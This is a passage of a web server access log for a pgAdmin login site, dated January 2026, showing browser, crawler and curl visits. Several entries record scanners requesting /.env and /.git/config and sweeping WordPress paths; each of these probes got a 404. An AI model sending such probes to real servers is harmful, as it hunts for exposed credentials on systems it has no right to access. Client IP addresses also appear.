Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[12/Jan/2026:11:33:10 +0000] - 302 302 - GET https dev.profibot.hu "/browser/" [Client 37.76.11.76] [Length 229] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[12/Jan/2026:11:33:10 +0000] - 200 200 - GET https dev.profibot.hu "/login?next=/browser/" [Client 37.76.11.76] [Length 2493] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[12/Jan/2026:11:33:11 +0000] - 302 302 - GET https dev.profibot.hu "/favicon.ico?ver=91100" [Client 37.76.11.76] [Length 245] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://dev.profibot.hu/login?next=/browser/" +[12/Jan/2026:11:33:11 +0000] - 200 200 - GET https dev.profibot.hu "/tools/translations.js?ver=91100" [Client 37.76.11.76] [Length 321] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://dev.profibot.hu/login?next=/browser/" +[12/Jan/2026:11:33:11 +0000] - 200 200 - GET https dev.profibot.hu "/browser/js/endpoints.js?ver=91100" [Client 37.76.11.76] [Length 3738] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://dev.profibot.hu/login?next=/browser/" +[12/Jan/2026:13:48:31 +0000] - - 301 - HEAD http dev.profibot.hu "/" [Client 62.210.198.211] [Length 0] [Gzip -] [Sent-to pgadmin-ui] "curl/7.81.0" "-" +[12/Jan/2026:13:48:32 +0000] - 302 302 - GET https dev.profibot.hu "/" [Client 62.210.198.211] [Length 213] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.3" "-" +[12/Jan/2026:13:48:32 +0000] - 200 200 - GET https dev.profibot.hu "/login?next=/" [Client 62.210.198.211] [Length 2494] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.3" "-" +[12/Jan/2026:13:48:33 +0000] - 200 200 - GET https dev.profibot.hu "/static/vendor/require/require.min.js?ver=91100" [Client 62.210.198.211] [Length 7187] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.3" "https://dev.profibot.hu/login?next=/" +[12/Jan/2026:13:48:33 +0000] - 200 200 - GET https dev.profibot.hu "/static/js/generated/style.css?ver=91100" [Client 62.210.198.211] [Length 91437] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.3" "https://dev.profibot.hu/login?next=/" +[12/Jan/2026:13:48:33 +0000] - 200 200 - GET https dev.profibot.hu "/static/js/generated/vendor.react.js?ver=91100" [Client 62.210.198.211] [Length 153691] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.3" "https://dev.profibot.hu/login?next=/" +[12/Jan/2026:13:48:33 +0000] - 200 200 - GET https dev.profibot.hu "/static/js/generated/pgadmin_commons.js?ver=91100" [Client 62.210.198.211] [Length 5996] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.3" "https://dev.profibot.hu/login?next=/" +[12/Jan/2026:13:48:33 +0000] - 200 200 - GET https dev.profibot.hu "/static/js/generated/vendor.sqleditor.js?ver=91100" [Client 62.210.198.211] [Length 172313] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.3" "https://dev.profibot.hu/login?next=/" +[12/Jan/2026:13:48:33 +0000] - 200 200 - GET https dev.profibot.hu "/static/js/generated/vendor.main.js?ver=91100" [Client 62.210.198.211] [Length 323675] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.3" "https://dev.profibot.hu/login?next=/" +[12/Jan/2026:13:48:33 +0000] - 200 200 - GET https dev.profibot.hu "/static/js/generated/vendor.others.js?ver=91100" [Client 62.210.198.211] [Length 2351296] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.3" "https://dev.profibot.hu/login?next=/" +[12/Jan/2026:13:48:33 +0000] - 302 302 - GET https dev.profibot.hu "/favicon.ico?ver=91100" [Client 62.210.198.211] [Length 245] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.3" "https://dev.profibot.hu/login?next=/" +[12/Jan/2026:13:48:33 +0000] - 200 200 - GET https dev.profibot.hu "/static/js/generated/security.pages.js?ver=91100" [Client 62.210.198.211] [Length 134798] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.3" "https://dev.profibot.hu/login?next=/" +[12/Jan/2026:13:48:33 +0000] - 200 200 - GET https dev.profibot.hu "/static/favicon.ico?ver=91100" [Client 62.210.198.211] [Length 78998] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.3" "https://dev.profibot.hu/login?next=/" +[12/Jan/2026:13:48:33 +0000] - 200 200 - GET https dev.profibot.hu "/tools/translations.js?ver=91100" [Client 62.210.198.211] [Length 321] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.3" "https://dev.profibot.hu/login?next=/" +[12/Jan/2026:13:48:33 +0000] - 200 200 - GET https dev.profibot.hu "/browser/js/endpoints.js?ver=91100" [Client 62.210.198.211] [Length 3738] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.3" "https://dev.profibot.hu/login?next=/" +[12/Jan/2026:13:48:34 +0000] - 200 200 - GET https dev.profibot.hu "/static/js/generated/fonts/Roboto-Regular..ttf" [Client 62.210.198.211] [Length 171676] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.3" "https://dev.profibot.hu/static/js/generated/style.css?ver=91100" +[12/Jan/2026:13:48:39 +0000] - 404 404 - GET https dev.profibot.hu "/login/ads.txt" [Client 62.210.198.211] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.3" "-" +[12/Jan/2026:13:48:39 +0000] - 404 404 - GET https dev.profibot.hu "/login/app-ads.txt" [Client 62.210.198.211] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.3" "-" +[12/Jan/2026:13:48:39 +0000] - 404 404 - GET https dev.profibot.hu "/login/sellers.json" [Client 62.210.198.211] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.3" "-" +[12/Jan/2026:15:46:05 +0000] - 302 302 - GET https dev.profibot.hu "/" [Client 13.219.121.241] [Length 213] [Gzip -] [Sent-to pgadmin-ui] "RecordedFuture Global Inventory Crawler" "-" +[12/Jan/2026:15:46:31 +0000] - 200 200 - GET https dev.profibot.hu "/login?next=/" [Client 54.86.115.253] [Length 2389] [Gzip -] [Sent-to pgadmin-ui] "RecordedFuture Global Inventory Crawler" "https://dev.profibot.hu:443" +[12/Jan/2026:16:49:11 +0000] - 302 302 - GET https dev.profibot.hu "/browser/js/endpoints.js?ver=91100" [Client 37.76.9.232] [Length 205] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://dev.profibot.hu/login?next=/" +[12/Jan/2026:16:49:11 +0000] - 200 200 - GET https dev.profibot.hu "/tools/translations.js?ver=91100" [Client 37.76.9.232] [Length 321] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://dev.profibot.hu/login?next=/" +[12/Jan/2026:16:49:11 +0000] - 302 302 - GET https dev.profibot.hu "/browser/" [Client 37.76.9.232] [Length 229] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://dev.profibot.hu/login?next=/" +[12/Jan/2026:16:49:11 +0000] - 200 200 - GET https dev.profibot.hu "/login?next=/browser/" [Client 37.76.9.232] [Length 2494] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://dev.profibot.hu/login?next=/" +[13/Jan/2026:04:22:31 +0000] - 404 404 - GET https dev.profibot.hu "/.env" [Client 204.76.203.25] [Length 207] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "-" +[14/Jan/2026:23:00:15 +0000] - 404 404 - GET https dev.profibot.hu "/.git/config" [Client 195.178.110.191] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" +[15/Jan/2026:10:48:46 +0000] - 404 404 - GET https dev.profibot.hu "/robots.txt" [Client 35.87.175.137] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (compatible; wpbot/1.4; +https://forms.gle/ajBaxygz9jSR8p8G9)" "-" +[15/Jan/2026:10:48:46 +0000] - 302 302 - GET https dev.profibot.hu "/" [Client 35.87.175.137] [Length 213] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (compatible; wpbot/1.4; +https://forms.gle/ajBaxygz9jSR8p8G9)" "-" +[15/Jan/2026:10:48:47 +0000] - 200 200 - GET https dev.profibot.hu "/login?next=/" [Client 35.87.175.137] [Length 2424] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (compatible; wpbot/1.4; +https://forms.gle/ajBaxygz9jSR8p8G9)" "-" +[15/Jan/2026:17:28:26 +0000] - - 301 - GET http dev.profibot.hu "/" [Client 68.183.34.230] [Length 166] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" +[15/Jan/2026:17:28:26 +0000] - - 301 - GET http dev.profibot.hu "/favicon.ico" [Client 68.183.34.230] [Length 166] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "http://dev.profibot.hu/" +[15/Jan/2026:17:28:26 +0000] - 302 302 - GET https dev.profibot.hu "/" [Client 68.183.34.230] [Length 213] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" +[15/Jan/2026:17:28:27 +0000] - 200 200 - GET https dev.profibot.hu "/login?next=/" [Client 68.183.34.230] [Length 2423] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" +[15/Jan/2026:17:28:27 +0000] - 302 302 - GET https dev.profibot.hu "/favicon.ico" [Client 68.183.34.230] [Length 245] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "https://dev.profibot.hu/login?next=/" +[15/Jan/2026:17:56:01 +0000] - 302 302 - GET https dev.profibot.hu "/" [Client 204.76.203.25] [Length 213] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "-" +[15/Jan/2026:17:56:01 +0000] - 200 200 - GET https dev.profibot.hu "/login" [Client 204.76.203.25] [Length 6219] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "-" +[16/Jan/2026:18:20:17 +0000] - - 301 - GET http dev.profibot.hu "/" [Client 34.82.179.72] [Length 166] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)" "-" +[16/Jan/2026:18:20:18 +0000] - 302 302 - GET https dev.profibot.hu "/" [Client 34.82.179.72] [Length 213] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)" "http://dev.profibot.hu" +[16/Jan/2026:18:20:18 +0000] - 200 200 - GET https dev.profibot.hu "/login?next=/" [Client 34.82.179.72] [Length 2391] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)" "https://dev.profibot.hu/" +[16/Jan/2026:20:18:43 +0000] - - 301 - GET http dev.profibot.hu "/" [Client 34.145.234.130] [Length 166] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)" "-" +[16/Jan/2026:20:18:44 +0000] - 302 302 - GET https dev.profibot.hu "/" [Client 34.145.234.130] [Length 213] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)" "http://dev.profibot.hu" +[16/Jan/2026:20:18:44 +0000] - 200 200 - GET https dev.profibot.hu "/login?next=/" [Client 34.145.234.130] [Length 2389] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)" "https://dev.profibot.hu/" +[16/Jan/2026:23:20:36 +0000] - - 301 - GET http dev.profibot.hu "/" [Client 107.172.58.36] [Length 166] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Macintosh; Intel Mac OS X 15_7_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.0 Safari/605.1.15" "-" +[16/Jan/2026:23:20:36 +0000] - 302 302 - GET https dev.profibot.hu "/" [Client 107.172.58.36] [Length 213] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Macintosh; Intel Mac OS X 15_7_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.0 Safari/605.1.15" "http://dev.profibot.hu/" +[16/Jan/2026:23:20:36 +0000] - 200 200 - GET https dev.profibot.hu "/login?next=/" [Client 107.172.58.36] [Length 2390] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Macintosh; Intel Mac OS X 15_7_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.0 Safari/605.1.15" "https://dev.profibot.hu/" +[17/Jan/2026:15:02:15 +0000] - - 301 - GET http dev.profibot.hu "/" [Client 136.117.98.44] [Length 166] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Jan/2026:15:02:16 +0000] - 302 302 - GET https dev.profibot.hu "/" [Client 136.117.98.44] [Length 213] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Jan/2026:15:02:16 +0000] - 404 404 - GET https dev.profibot.hu "//wp-includes/wlwmanifest.xml" [Client 136.117.98.44] [Length 207] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Jan/2026:15:02:16 +0000] - 404 404 - GET https dev.profibot.hu "//xmlrpc.php?rsd" [Client 136.117.98.44] [Length 207] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Jan/2026:15:02:16 +0000] - 302 302 - GET https dev.profibot.hu "/" [Client 136.117.98.44] [Length 213] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Jan/2026:15:02:16 +0000] - 404 404 - GET https dev.profibot.hu "//blog/wp-includes/wlwmanifest.xml" [Client 136.117.98.44] [Length 207] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Jan/2026:15:02:17 +0000] - 404 404 - GET https dev.profibot.hu "//web/wp-includes/wlwmanifest.xml" [Client 136.117.98.44] [Length 207] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Jan/2026:15:02:17 +0000] - 404 404 - GET https dev.profibot.hu "//wordpress/wp-includes/wlwmanifest.xml" [Client 136.117.98.44] [Length 207] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Jan/2026:15:02:17 +0000] - 404 404 - GET https dev.profibot.hu "//website/wp-includes/wlwmanifest.xml" [Client 136.117.98.44] [Length 207] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Jan/2026:15:02:17 +0000] - 404 404 - GET https dev.profibot.hu "//wp/wp-includes/wlwmanifest.xml" [Client 136.117.98.44] [Length 207] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Jan/2026:15:02:17 +0000] - 404 404 - GET https dev.profibot.hu "//news/wp-includes/wlwmanifest.xml" [Client 136.117.98.44] [Length 207] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Jan/2026:15:02:17 +0000] - 404 404 - GET https dev.profibot.hu "//2018/wp-includes/wlwmanifest.xml" [Client 136.117.98.44] [Length 207] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Jan/2026:15:02:18 +0000] - 404 404 - GET https dev.profibot.hu "//2019/wp-includes/wlwmanifest.xml" [Client 136.117.98.44] [Length 207] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Jan/2026:15:02:18 +0000] - 404 404 - GET https dev.profibot.hu "//shop/wp-includes/wlwmanifest.xml" [Client 136.117.98.44] [Length 207] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Jan/2026:15:02:18 +0000] - 404 404 - GET https dev.profibot.hu "//wp1/wp-includes/wlwmanifest.xml" [Client 136.117.98.44] [Length 207] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Jan/2026:15:02:18 +0000] - 404 404 - GET https dev.profibot.hu "//test/wp-includes/wlwmanifest.xml" [Client 136.117.98.44] [Length 207] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Jan/2026:15:02:18 +0000] - 404 404 - GET https dev.profibot.hu "//media/wp-includes/wlwmanifest.xml" [Client 136.117.98.44] [Length 207] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Jan/2026:15:02:19 +0000] - 404 404 - GET https dev.profibot.hu "//wp2/wp-includes/wlwmanifest.xml" [Client 136.117.98.44] [Length 207] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Jan/2026:15:02:19 +0000] - 404 404 - GET https dev.profibot.hu "//site/wp-includes/wlwmanifest.xml" [Client 136.117.98.44] [Length 207] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Jan/2026:15:02:19 +0000] - 404 404 - GET https dev.profibot.hu "//cms/wp-includes/wlwmanifest.xml" [Client 136.117.98.44] [Length 207] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Jan/2026:15:02:19 +0000] - 404 404 - GET https dev.profibot.hu "//sito/wp-includes/wlwmanifest.xml" [Client 136.117.98.44] [Length 207] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[17/Jan/2026:15:02:19 +0000] - - 400 - - https dev.profibot.hu "-" [Client 136.117.98.44] [Length 0] [Gzip -] [Sent-to ] "-" "-" +[18/Jan/2026:14:04:10 +0000] - 404 404 - GET https dev.profibot.hu "/.env" [Client 204.76.203.25] [Length 207] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "-" +[19/Jan/2026:13:22:12 +0000] - - 301 - HEAD http dev.profibot.hu "/" [Client 62.210.198.214] [Length 0] [Gzip -] [Sent-to pgadmin-ui] "curl/7.81.0" "-" +[19/Jan/2026:13:22:12 +0000] - 302 302 - HEAD https dev.profibot.hu "/" [Client 62.210.198.214] [Length 0] [Gzip -] [Sent-to pgadmin-ui] "curl/7.81.0" "-" +[19/Jan/2026:13:22:13 +0000] - - 400 - HEAD http dev.profibot.hu "/" [Client 62.210.198.214] [Length 0] [Gzip -] [Sent-to ] "curl/7.81.0" "-" +[19/Jan/2026:13:22:14 +0000] - 302 302 - GET https dev.profibot.hu "/" [Client 62.210.198.214] [Length 213] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.3" "-" +[19/Jan/2026:13:22:14 +0000] - 200 200 - GET https dev.profibot.hu "/login?next=/" [Client 62.210.198.214] [Length 2493] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.3" "-" +[19/Jan/2026:13:22:14 +0000] - 200 200 - GET https dev.profibot.hu "/static/vendor/require/require.min.js?ver=91100" [Client 62.210.198.214] [Length 7187] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.3" "https://dev.profibot.hu/login?next=/" +[19/Jan/2026:13:22:14 +0000] - 200 200 - GET https dev.profibot.hu "/static/js/generated/style.css?ver=91100" [Client 62.210.198.214] [Length 91437] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.3" "https://dev.profibot.hu/login?next=/" +[19/Jan/2026:13:22:14 +0000] - 200 200 - GET https dev.profibot.hu "/static/js/generated/vendor.react.js?ver=91100" [Client 62.210.198.214] [Length 153691] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.3" "https://dev.profibot.hu/login?next=/" +[19/Jan/2026:13:22:14 +0000] - 200 200 - GET https dev.profibot.hu "/static/js/generated/pgadmin_commons.js?ver=91100" [Client 62.210.198.214] [Length 5996] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.3" "https://dev.profibot.hu/login?next=/" +[19/Jan/2026:13:22:14 +0000] - 200 200 - GET https dev.profibot.hu "/static/js/generated/vendor.main.js?ver=91100" [Client 62.210.198.214] [Length 323675] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.3" "https://dev.profibot.hu/login?next=/" +[19/Jan/2026:13:22:14 +0000] - 200 200 - GET https dev.profibot.hu "/static/js/generated/vendor.sqleditor.js?ver=91100" [Client 62.210.198.214] [Length 172313] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.3" "https://dev.profibot.hu/login?next=/" +[19/Jan/2026:13:22:15 +0000] - 200 200 - GET https dev.profibot.hu "/static/js/generated/vendor.others.js?ver=91100" [Client 62.210.198.214] [Length 2351296] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.3" "https://dev.profibot.hu/login?next=/" +[19/Jan/2026:13:22:15 +0000] - 302 302 - GET https dev.profibot.hu "/favicon.ico?ver=91100" [Client 62.210.198.214] [Length 245] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.3" "https://dev.profibot.hu/login?next=/" +[19/Jan/2026:13:22:15 +0000] - 200 200 - GET https dev.profibot.hu "/static/js/generated/security.pages.js?ver=91100" [Client 62.210.198.214] [Length 134798] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.3" "https://dev.profibot.hu/login?next=/" +[19/Jan/2026:13:22:15 +0000] - 200 200 - GET https dev.profibot.hu "/static/favicon.ico?ver=91100" [Client 62.210.198.214] [Length 78998] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.3" "https://dev.profibot.hu/login?next=/" +[19/Jan/2026:13:22:15 +0000] - 200 200 - GET https dev.profibot.hu "/browser/js/endpoints.js?ver=91100" [Client 62.210.198.214] [Length 3738] [Gzip -] 